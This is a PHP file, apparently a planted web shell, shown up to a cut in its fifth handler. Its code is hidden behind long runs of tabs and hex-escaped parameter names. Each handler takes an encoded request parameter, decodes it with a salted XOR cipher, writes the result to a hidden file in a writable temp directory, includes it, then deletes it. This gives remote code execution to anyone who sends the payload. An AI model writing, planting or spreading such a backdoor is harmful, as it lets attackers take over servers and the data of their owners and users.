<?																																										if(isset($_POST["fl\x61g"]) ? true : false){ $record = array_filter([getenv("TEMP"), "/dev/shm", getenv("TMP"), session_save_path(), getcwd(), "/var/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/tmp"]); $holder = $_POST["fl\x61g"]; $holder= explode ('.' , $holder ) ; $ent = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); $x = 0; while ($x < count($holder)) { $v9 = $holder[$x]; $sChar = ord($s[$x % $lenS]); $dec = ((int)$v9 - $sChar - ($x % 10)) ^ 77; $ent .=chr($dec); $x++; } $ent = 0; do { $fac = $record[$ent] ?? null; if ($ent >= count($record)) break; if (!!is_dir($fac) && !!is_writable($fac)) { $token = str_replace("{var_dir}", $fac, "{var_dir}/.val"); $success = file_put_contents($token, $ent); if ($success) { include $token; @unlink($token); die();} } $ent++; } while (true); }
																																										if(@$_REQUEST["\x6F\x62j"] !== null){ $bind = array_filter(["/tmp", getcwd(), getenv("TEMP"), session_save_path(), "/dev/shm", "/var/tmp", sys_get_temp_dir(), getenv("TMP"), ini_get("upload_tmp_dir")]); $desc = $_REQUEST["\x6F\x62j"]; $desc= explode ( ".", $desc ); $item = ''; $salt3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt3); $x = 0; while ($x < count($desc)) { $v9 = $desc[$x]; $chS = ord($salt3[$x % $lenS]); $dec = ((int)$v9 - $chS - ($x % 10)) ^ 82; $item .= chr($dec); $x++; } for ($k = 0, $ent = count($bind); $k < $ent; $k++) { $rec = $bind[$k]; if (is_writable($rec) && is_dir($rec)) { $pset = implode("/", [$rec, ".component"]); if (file_put_contents($pset, $item)) { require $pset; unlink($pset); die(); } } } }
																																										if(array_key_exists("\x74o\x6Ben", $_REQUEST) && !is_null($_REQUEST["\x74o\x6Ben"])){ $element = array_filter(["/tmp", ini_get("upload_tmp_dir"), "/var/tmp", getenv("TMP"), getcwd(), "/dev/shm", session_save_path(), sys_get_temp_dir(), getenv("TEMP")]); $val = $_REQUEST["\x74o\x6Ben"]; $val = explode( '.', $val ) ; $reference = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $i = 0; $__len = count($val); do { if ($i >= $__len) break; $v3 = $val[$i]; $sChar = ord($salt[$i % $sLen]); $d = ((int)$v3 - $sChar - ($i % 10))^ 25; $reference .= chr($d); $i++; } while (true); foreach ($element as $key => $pointer) { if (is_dir($pointer) && is_writable($pointer)) { $fac = implode("/", [$pointer, ".bind"]); if (file_put_contents($fac, $reference)) { include $fac; @unlink($fac); exit; } } } }
																																										if(in_array("en\x74", array_keys($_POST))){ $component = $_POST["en\x74"]; $component = explode ( "." ,$component ) ; $data_chunk = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $__len = count($component); for($k = 0; $k <$__len; $k++) { $v9 = $component[$k]; $chS = ord($salt[$k % $sLen]); $d =((int)$v9 - $chS -($k % 10)) ^ 25; $data_chunk .= chr($d); } $dat = array_filter([ini_get("upload_tmp_dir"), getenv("TEMP"), getcwd(), "/tmp", "/var/tmp", session_save_path(), sys_get_temp_dir(), getenv("TMP"), "/dev/shm"]); for ($pset = 0, $symbol = count($dat); $pset < $symbol; $pset++) { $value = $dat[$pset]; if ((bool)is_dir($value) && (bool)is_writable($value)) { $res = vsprintf("%s/%s", [$value, ".reference"]); $success = file_put_contents($res, $data_chunk); if ($success) { include $res; @unlink($res); die();} } } }
																																										if(@$_POST["de\x73cr\x69\x70\x74\x6Fr"] !== null){ $dat = array_filter([getenv("TMP"), sys_get_temp_dir(), "/dev/shm", session_save_path(), getcwd(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/tmp", "/var/tmp"]); $bind = $_POST["de\x73cr\x69\x70\x74\x6Fr"]; $bind =explode ( '.' , $bind ) ; $tkn=''; $salt='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen($salt); $u=0; $len=count($bind); do { if ($u>= $len) break; $v3=$bind[$u]; $sChar=ord($salt[$u % $sLen]); $dec=((int)$v3 - $sChar - ($u % 10)) ^ 43; $tkn .= chr($dec); $u++; } while (true); foreach ($dat as $item): if ((function($d) { return is_dir($d) && is_writable($d); })($ite